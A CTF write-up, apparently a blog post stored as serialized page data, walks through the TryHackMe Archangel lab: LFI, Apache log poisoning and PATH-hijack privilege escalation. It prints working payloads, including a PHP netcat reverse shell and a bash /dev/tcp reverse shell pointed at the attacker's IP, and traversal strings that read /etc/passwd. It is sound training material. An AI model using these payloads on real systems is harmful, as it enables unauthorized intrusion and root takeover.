[{"data":1,"prerenderedAt":795},["ShallowReactive",2],{"\u002F2025\u002Ftryhackme-archangel-writeup":3,"surround-\u002F2025\u002Ftryhackme-archangel-writeup":786},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"recommend":6,"draft":6,"readingTime":14,"body":19,"_type":779,"_id":780,"_source":781,"_file":782,"_stem":783,"_extension":784,"_original_dir":785},"\u002F2025\u002Ftryhackme-archangel-writeup","2025",false,"","TryHackMe - Archangel","A detailed writeup on the TryHackMe Archangel room. This walkthrough covers exploiting a Local File Inclusion (LFI) vulnerability to gain initial access through Apache log poisoning, and escalating privileges to root via a cronjob and PATH hijacking.","2025-09-08T17:50:48.000Z","https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002Fthumbnail.jpg",[13],"CTF",{"text":15,"minutes":16,"time":17,"words":18},"4 min read",3.13,187800,626,{"type":20,"children":21,"toc":768},"root",[22,28,44,51,55,77,81,136,140,152,156,161,166,170,191,195,199,212,239,243,265,271,276,344,348,360,364,369,373,379,424,430,443,447,460,464,484,518,522,528,539,543,570,574,578,637,694,758,762],{"type":23,"tag":24,"props":25,"children":27},"element","pic",{"src":26},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F1.jpg",[],{"type":23,"tag":29,"props":30,"children":31},"p",{},[32,35],{"type":33,"value":34},"text","Target IP: ",{"type":23,"tag":36,"props":37,"children":41},"a",{"href":38,"rel":39},"https:\u002F\u002Ftryhackme.com\u002Froom\u002Farchangel",[40],"nofollow",[42],{"type":33,"value":43},"archangel.thm , mafialive.thm",{"type":23,"tag":45,"props":46,"children":48},"h2",{"id":47},"reconnaissance",[49],{"type":33,"value":50},"Reconnaissance",{"type":23,"tag":24,"props":52,"children":54},{"src":53},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F2.jpg",[],{"type":23,"tag":29,"props":56,"children":57},{},[58,60,67,69,75],{"type":33,"value":59},"We have ",{"type":23,"tag":61,"props":62,"children":64},"code",{"className":63},[],[65],{"type":33,"value":66},"ssh",{"type":33,"value":68}," and ",{"type":23,"tag":61,"props":70,"children":72},{"className":71},[],[73],{"type":33,"value":74},"http",{"type":33,"value":76}," services. Let's check the http service.",{"type":23,"tag":24,"props":78,"children":80},{"src":79},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F3.jpg",[],{"type":23,"tag":29,"props":82,"children":83},{},[84,86,95,97,103,105,111,113,119,121,126,128,134],{"type":33,"value":85},"We perform a directory scan on the site but don't find anything. However, the support email address ",{"type":23,"tag":61,"props":87,"children":92},{"className":88,"id":90,"style":91},[89],"example-info","just-like-this","color: #efb11d",[93],{"type":33,"value":94},"support@mafialive.thm",{"type":33,"value":96}," catches our attention. This is a different address from ",{"type":23,"tag":61,"props":98,"children":100},{"className":99},[],[101],{"type":33,"value":102},"archangel.thm",{"type":33,"value":104},". As we know, multiple domains can be hosted on the same IP address. (This is often referred to as Virtual Hosting.) So, let's update our ",{"type":23,"tag":61,"props":106,"children":108},{"className":107},[],[109],{"type":33,"value":110},"\u002Fetc\u002Fhosts",{"type":33,"value":112}," file and access the content of ",{"type":23,"tag":61,"props":114,"children":116},{"className":115},[],[117],{"type":33,"value":118},"mafialive.thm",{"type":33,"value":120},". (We previously added ",{"type":23,"tag":61,"props":122,"children":124},{"className":123},[],[125],{"type":33,"value":102},{"type":33,"value":127},", now we are adding ",{"type":23,"tag":61,"props":129,"children":132},{"className":130,"id":90,"style":131},[89],"color: #4DFFBE",[133],{"type":33,"value":118},{"type":33,"value":135},". You can use both at the same time. The web server will serve different content based on the hostname.)",{"type":23,"tag":24,"props":137,"children":139},{"src":138},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F4.jpg",[],{"type":23,"tag":29,"props":141,"children":142},{},[143,145,150],{"type":33,"value":144},"Now let's check ",{"type":23,"tag":61,"props":146,"children":148},{"className":147},[],[149],{"type":33,"value":118},{"type":33,"value":151},".",{"type":23,"tag":24,"props":153,"children":155},{"src":154},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F5.jpg",[],{"type":23,"tag":29,"props":157,"children":158},{},[159],{"type":33,"value":160},"Now let's do a directory scan to get more information.",{"type":23,"tag":162,"props":163,"children":165},"copy",{"code":164},"feroxbuster -eBEg --auto-tune --scan-limit 3 -u http:\u002F\u002Fmafialive.thm --wordlist \u002Fusr\u002Fshare\u002Fwordlists\u002Fdirb\u002Fcommon.txt",[],{"type":23,"tag":24,"props":167,"children":169},{"src":168},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F6.jpg",[],{"type":23,"tag":29,"props":171,"children":172},{},[173,175,181,183,189],{"type":33,"value":174},"From the scan, we see the ",{"type":23,"tag":61,"props":176,"children":178},{"className":177},[],[179],{"type":33,"value":180},"\u002Frobots.txt",{"type":33,"value":182}," file, and upon examining it, we find the ",{"type":23,"tag":61,"props":184,"children":186},{"className":185,"id":90,"style":131},[89],[187],{"type":33,"value":188},"\u002Ftest.php",{"type":33,"value":190}," directory.",{"type":23,"tag":24,"props":192,"children":194},{"src":193},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F7.jpg",[],{"type":23,"tag":24,"props":196,"children":198},{"src":197},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F8.jpg",[],{"type":23,"tag":29,"props":200,"children":201},{},[202,204,210],{"type":33,"value":203},"At this point, we are greeted by a button. When we press it, we see that a query is made with the value ",{"type":23,"tag":61,"props":205,"children":207},{"className":206,"id":90,"style":91},[89],[208],{"type":33,"value":209},"?view=\u002Fvar\u002Fwww\u002Fhtml\u002Fdevelopment_testing\u002Fmrrobot.php",{"type":33,"value":211}," in the URL. This leads us to suspect that there might be an LFI vulnerability on the target.",{"type":23,"tag":213,"props":214,"children":216},"alert",{"type":215},"info",[217,226],{"type":23,"tag":218,"props":219,"children":220},"template",{"v-slot:title":7},[221],{"type":23,"tag":29,"props":222,"children":223},{},[224],{"type":33,"value":225},"What is an LFI Vulnerability?",{"type":23,"tag":29,"props":227,"children":228},{},[229,231,237],{"type":33,"value":230},"LFI (Local File Inclusion) is a security vulnerability that occurs when a web application reads or executes files on the server by using a file name from user input without proper validation. Through this vulnerability, an attacker can view sensitive system files (like ",{"type":23,"tag":61,"props":232,"children":234},{"className":233},[],[235],{"type":33,"value":236},"\u002Fetc\u002Fpasswd",{"type":33,"value":238},") or application source code that they should not normally have access to.",{"type":23,"tag":24,"props":240,"children":242},{"src":241},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F9.jpg",[],{"type":23,"tag":29,"props":244,"children":245},{},[246,248,254,256,263],{"type":33,"value":247},"When we check with ",{"type":23,"tag":61,"props":249,"children":251},{"className":250,"id":90,"style":131},[89],[252],{"type":33,"value":253},"?view=\u002Fvar\u002Fwww\u002Fhtml\u002Fdevelopment_testing\u002F\u002F..\u002F\u002F..\u002F\u002F..\u002F\u002F..\u002F\u002Fetc\u002Fpasswd",{"type":33,"value":255},", we confirm that we can access the content. In this case, to exploit the LFI and achieve RCE, we will use ",{"type":23,"tag":36,"props":257,"children":260},{"href":258,"rel":259},"https:\u002F\u002Fswisskyrepo.github.io\u002FPayloadsAllTheThings\u002FFile%20Inclusion\u002FLFI-to-RCE\u002F#rce-via-apache-logs",[40],[261],{"type":33,"value":262},"Apache log poisoning",{"type":33,"value":264}," since we know the target system is running Apache.",{"type":23,"tag":45,"props":266,"children":268},{"id":267},"initial-access",[269],{"type":33,"value":270},"Initial Access",{"type":23,"tag":29,"props":272,"children":273},{},[274],{"type":33,"value":275},"As a first step, we send a request containing our payload to be recorded in the logs. (I will put it in the User-Agent.)",{"type":23,"tag":277,"props":278,"children":283},"pre",{"className":279,"code":280,"filename":281,"language":282,"meta":7,"style":7},"language-php shiki shiki-themes catppuccin-latte one-dark-pro","\u003C?php exec('rm \u002Ftmp\u002Ff;mkfifo \u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.8.13.246 1234 >\u002Ftmp\u002Ff'); ?>\n","payload","php",[284],{"type":23,"tag":61,"props":285,"children":286},{"__ignoreMap":7},[287],{"type":23,"tag":288,"props":289,"children":292},"span",{"class":290,"line":291},"line",1,[293,299,305,311,317,323,329,334,339],{"type":23,"tag":288,"props":294,"children":296},{"style":295},"--shiki-default:#179299;--shiki-dark:#56B6C2",[297],{"type":33,"value":298},"\u003C",{"type":23,"tag":288,"props":300,"children":302},{"style":301},"--shiki-default:#179299;--shiki-dark:#C678DD",[303],{"type":33,"value":304},"?",{"type":23,"tag":288,"props":306,"children":308},{"style":307},"--shiki-default:#4C4F69;--shiki-dark:#ABB2BF",[309],{"type":33,"value":310},"php ",{"type":23,"tag":288,"props":312,"children":314},{"style":313},"--shiki-default:#1E66F5;--shiki-default-font-style:italic;--shiki-dark:#56B6C2;--shiki-dark-font-style:inherit",[315],{"type":33,"value":316},"exec",{"type":23,"tag":288,"props":318,"children":320},{"style":319},"--shiki-default:#7C7F93;--shiki-dark:#ABB2BF",[321],{"type":33,"value":322},"(",{"type":23,"tag":288,"props":324,"children":326},{"style":325},"--shiki-default:#40A02B;--shiki-dark:#98C379",[327],{"type":33,"value":328},"'rm \u002Ftmp\u002Ff;mkfifo \u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.8.13.246 1234 >\u002Ftmp\u002Ff'",{"type":23,"tag":288,"props":330,"children":331},{"style":319},[332],{"type":33,"value":333},");",{"type":23,"tag":288,"props":335,"children":336},{"style":301},[337],{"type":33,"value":338}," ?",{"type":23,"tag":288,"props":340,"children":341},{"style":295},[342],{"type":33,"value":343},">\n",{"type":23,"tag":24,"props":345,"children":347},{"src":346},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F10.jpg",[],{"type":23,"tag":29,"props":349,"children":350},{},[351,353,359],{"type":33,"value":352},"And now, to execute the malicious PHP code in our log, we will make a request with the query ",{"type":23,"tag":61,"props":354,"children":356},{"className":355},[],[357],{"type":33,"value":358},"?view=\u002Fvar\u002Fwww\u002Fhtml\u002Fdevelopment_testing\u002F\u002F..\u002F\u002F..\u002F\u002F..\u002F\u002F..\u002F\u002Fvar\u002Flog\u002Fapache2\u002Faccess.log",{"type":33,"value":151},{"type":23,"tag":24,"props":361,"children":363},{"src":362},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F11.jpg",[],{"type":23,"tag":29,"props":365,"children":366},{},[367],{"type":33,"value":368},"And we got a shell.",{"type":23,"tag":24,"props":370,"children":372},{"src":371},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F12.jpg",[],{"type":23,"tag":45,"props":374,"children":376},{"id":375},"privilege-escalation",[377],{"type":33,"value":378},"Privilege Escalation",{"type":23,"tag":29,"props":380,"children":381},{},[382,384,390,392,398,400,407,409,415,417,423],{"type":33,"value":383},"Now, let's get an interactive shell with ",{"type":23,"tag":61,"props":385,"children":387},{"className":386},[],[388],{"type":33,"value":389},"python3 -c 'import pty; pty.spawn(\"\u002Fbin\u002Fbash\")'",{"type":33,"value":391},", go to the ",{"type":23,"tag":61,"props":393,"children":395},{"className":394},[],[396],{"type":33,"value":397},"\u002Ftmp",{"type":33,"value":399}," directory, and download the automated privilege escalation script ",{"type":23,"tag":36,"props":401,"children":404},{"href":402,"rel":403},"https:\u002F\u002Fgithub.com\u002Fpeass-ng\u002FPEASS-ng\u002Ftree\u002Fmaster\u002FlinPEAS",[40],[405],{"type":33,"value":406},"linpeas.sh",{"type":33,"value":408}," from our attack machine to the target system and give it the necessary permissions. (In my case, I put the file on my Apache server and downloaded it to the target with ",{"type":23,"tag":61,"props":410,"children":412},{"className":411},[],[413],{"type":33,"value":414},"wget",{"type":33,"value":416},".). Now let's run the script with ",{"type":23,"tag":61,"props":418,"children":420},{"className":419},[],[421],{"type":33,"value":422},".\u002Flinpeas.sh",{"type":33,"value":151},{"type":23,"tag":425,"props":426,"children":428},"h3",{"id":427},"www-data",[429],{"type":33,"value":427},{"type":23,"tag":29,"props":431,"children":432},{},[433,435,441],{"type":33,"value":434},"From the output, a cronjob for the ",{"type":23,"tag":61,"props":436,"children":438},{"className":437,"id":90,"style":131},[89],[439],{"type":33,"value":440},"\u002Fopt\u002Fhelloworld.sh",{"type":33,"value":442}," file catches our attention.",{"type":23,"tag":24,"props":444,"children":446},{"src":445},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F13.jpg",[],{"type":23,"tag":29,"props":448,"children":449},{},[450,452,458],{"type":33,"value":451},"When we go to this directory and examine the file, we see that we have ",{"type":23,"tag":61,"props":453,"children":455},{"className":454,"id":90,"style":91},[89],[456],{"type":33,"value":457},"write",{"type":33,"value":459}," permission.",{"type":23,"tag":24,"props":461,"children":463},{"src":462},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F14.jpg",[],{"type":23,"tag":29,"props":465,"children":466},{},[467,469,475,477,482],{"type":33,"value":468},"So, if we add a reverse shell to this file, the cronjob will run this script every minute with ",{"type":23,"tag":61,"props":470,"children":472},{"className":471},[],[473],{"type":33,"value":474},"archangel",{"type":33,"value":476}," privileges, allowing us to get a shell as ",{"type":23,"tag":61,"props":478,"children":480},{"className":479},[],[481],{"type":33,"value":474},{"type":33,"value":483},". Let's add a reverse shell to the script with the following command.",{"type":23,"tag":277,"props":485,"children":489},{"className":486,"code":487,"language":488,"meta":7,"style":7},"language-bash shiki shiki-themes catppuccin-latte one-dark-pro","echo \"bash -i >& \u002Fdev\u002Ftcp\u002F10.8.13.246\u002F1234 0>&1\" >> helloworld.sh\n","bash",[490],{"type":23,"tag":61,"props":491,"children":492},{"__ignoreMap":7},[493],{"type":23,"tag":288,"props":494,"children":495},{"class":290,"line":291},[496,502,507,513],{"type":23,"tag":288,"props":497,"children":499},{"style":498},"--shiki-default:#D20F39;--shiki-default-font-style:italic;--shiki-dark:#56B6C2;--shiki-dark-font-style:inherit",[500],{"type":33,"value":501},"echo",{"type":23,"tag":288,"props":503,"children":504},{"style":325},[505],{"type":33,"value":506}," \"bash -i >& \u002Fdev\u002Ftcp\u002F10.8.13.246\u002F1234 0>&1\"",{"type":23,"tag":288,"props":508,"children":510},{"style":509},"--shiki-default:#179299;--shiki-dark:#ABB2BF",[511],{"type":33,"value":512}," >>",{"type":23,"tag":288,"props":514,"children":515},{"style":325},[516],{"type":33,"value":517}," helloworld.sh\n",{"type":23,"tag":24,"props":519,"children":521},{"src":520},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F15.jpg",[],{"type":23,"tag":425,"props":523,"children":525},{"id":524},"archangel-root",[526],{"type":33,"value":527},"archangel -> root",{"type":23,"tag":29,"props":529,"children":530},{},[531,533,538],{"type":33,"value":532},"After waiting a bit on our listener, we get a shell as ",{"type":23,"tag":61,"props":534,"children":536},{"className":535},[],[537],{"type":33,"value":474},{"type":33,"value":151},{"type":23,"tag":24,"props":540,"children":542},{"src":541},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F16.jpg",[],{"type":23,"tag":29,"props":544,"children":545},{},[546,548,553,555,561,563],{"type":33,"value":547},"In the current directory, we see a file owned by ",{"type":23,"tag":61,"props":549,"children":551},{"className":550},[],[552],{"type":33,"value":20},{"type":33,"value":554}," with the ",{"type":23,"tag":61,"props":556,"children":558},{"className":557},[],[559],{"type":33,"value":560},"SUID",{"type":33,"value":562}," bit set. ",{"type":23,"tag":36,"props":564,"children":567},{"href":565,"rel":566},"https:\u002F\u002Fhackpaper.com\u002F2025\u002Ffile-permissions-and-management-in-linux#suid-set-user-id",[40],[568],{"type":33,"value":569},"see.",{"type":23,"tag":24,"props":571,"children":573},{"src":572},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F17.jpg",[],{"type":23,"tag":24,"props":575,"children":577},{"src":576},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F19.jpg",[],{"type":23,"tag":29,"props":579,"children":580},{},[581,583,589,591,597,599,606,608,614,616,621,623,628,630,635],{"type":33,"value":582},"When we examine this file, we see that it is used to copy files from the ",{"type":23,"tag":61,"props":584,"children":586},{"className":585},[],[587],{"type":33,"value":588},"\u002Fhome\u002Fuser\u002Farchangel\u002Fmyfiles",{"type":33,"value":590}," directory to the ",{"type":23,"tag":61,"props":592,"children":594},{"className":593},[],[595],{"type":33,"value":596},"\u002Fopt\u002Fbackupfiles",{"type":33,"value":598}," directory. Here, the ",{"type":23,"tag":61,"props":600,"children":603},{"className":601,"id":90,"style":602},[89],"color: #EA5B6F",[604],{"type":33,"value":605},"cp",{"type":33,"value":607}," command catches our attention. If we can change our ",{"type":23,"tag":61,"props":609,"children":611},{"className":610,"id":90,"style":131},[89],[612],{"type":33,"value":613},"$PATH",{"type":33,"value":615}," variable, we can create our own fake ",{"type":23,"tag":61,"props":617,"children":619},{"className":618},[],[620],{"type":33,"value":605},{"type":33,"value":622}," and make the script use our fake ",{"type":23,"tag":61,"props":624,"children":626},{"className":625},[],[627],{"type":33,"value":605},{"type":33,"value":629}," instead of the original one.(This technique is known as PATH hijacking.) So let's start by creating our own fake ",{"type":23,"tag":61,"props":631,"children":633},{"className":632},[],[634],{"type":33,"value":605},{"type":33,"value":636},":",{"type":23,"tag":638,"props":639,"children":640},"ol",{},[641,670,682],{"type":23,"tag":642,"props":643,"children":644},"li",{},[645,647,653,655,661,663,669],{"type":33,"value":646},"Create a ",{"type":23,"tag":61,"props":648,"children":651},{"className":649,"id":90,"style":650},[89],"color: #77BEF0",[652],{"type":33,"value":605},{"type":33,"value":654}," file in the ",{"type":23,"tag":61,"props":656,"children":658},{"className":657,"id":90,"style":650},[89],[659],{"type":33,"value":660},"\u002Fhome\u002Farchangel",{"type":33,"value":662}," directory with ",{"type":23,"tag":61,"props":664,"children":666},{"className":665,"id":90,"style":650},[89],[667],{"type":33,"value":668},"touch cp",{"type":33,"value":151},{"type":23,"tag":642,"props":671,"children":672},{},[673,675,681],{"type":33,"value":674},"Add the code to run bash into it with ",{"type":23,"tag":61,"props":676,"children":678},{"className":677,"id":90,"style":650},[89],[679],{"type":33,"value":680},"echo \"\u002Fbin\u002Fbash\" > \u002Fhome\u002Farchangel\u002Fcp",{"type":33,"value":151},{"type":23,"tag":642,"props":683,"children":684},{},[685,687,693],{"type":33,"value":686},"Give it the necessary permissions with ",{"type":23,"tag":61,"props":688,"children":690},{"className":689,"id":90,"style":650},[89],[691],{"type":33,"value":692},"chmod +x \u002Fhome\u002Farchangel\u002Fcp",{"type":33,"value":151},{"type":23,"tag":29,"props":695,"children":696},{},[697,699,704,706,711,713,719,721,726,728,734,736,741,743,748,750,756],{"type":33,"value":698},"Now, let's add the path where our fake ",{"type":23,"tag":61,"props":700,"children":702},{"className":701,"id":90,"style":131},[89],[703],{"type":33,"value":605},{"type":33,"value":705}," is located to the beginning of the ",{"type":23,"tag":61,"props":707,"children":709},{"className":708,"id":90,"style":131},[89],[710],{"type":33,"value":613},{"type":33,"value":712}," variable with ",{"type":23,"tag":61,"props":714,"children":716},{"className":715,"id":90,"style":131},[89],[717],{"type":33,"value":718},"export PATH=\u002Fhome\u002Farchangel\u002F:$PATH",{"type":33,"value":720},". This way, since the full path for ",{"type":23,"tag":61,"props":722,"children":724},{"className":723},[],[725],{"type":33,"value":605},{"type":33,"value":727}," is not specified in the ",{"type":23,"tag":61,"props":729,"children":731},{"className":730},[],[732],{"type":33,"value":733},"backup",{"type":33,"value":735}," script, the system will look at the ",{"type":23,"tag":61,"props":737,"children":739},{"className":738},[],[740],{"type":33,"value":613},{"type":33,"value":742}," variable, and because it scans from left to right, it will find our fake ",{"type":23,"tag":61,"props":744,"children":746},{"className":745},[],[747],{"type":33,"value":605},{"type":33,"value":749}," before the original one. Then, let's run the script with ",{"type":23,"tag":61,"props":751,"children":753},{"className":752},[],[754],{"type":33,"value":755},".\u002Fbackup",{"type":33,"value":757}," and become root.",{"type":23,"tag":24,"props":759,"children":761},{"src":760},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-archangel-writeup\u002F18.jpg",[],{"type":23,"tag":763,"props":764,"children":765},"style",{},[766],{"type":33,"value":767},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":7,"searchDepth":769,"depth":769,"links":770},4,[771,773,774],{"id":47,"depth":772,"text":50},2,{"id":267,"depth":772,"text":270},{"id":375,"depth":772,"text":378,"children":775},[776,778],{"id":427,"depth":777,"text":427},3,{"id":524,"depth":777,"text":527},"markdown","content:posts:2025:tryhackme-archangel-writeup.md","content","posts\u002F2025\u002Ftryhackme-archangel-writeup.md","posts\u002F2025\u002Ftryhackme-archangel-writeup","md","\u002Fposts",[787,791],{"_path":788,"title":789,"date":790},"\u002F2025\u002Ftryhackme-gamingserver-writeup","TryHackMe - GamingServer","2025-09-05T08:18:55.000Z",{"_path":792,"title":793,"date":794},"\u002F2025\u002Ftryhackme-couch-writeup","TryHackMe - Couch","2025-10-22T06:11:23.000Z",1777022958802]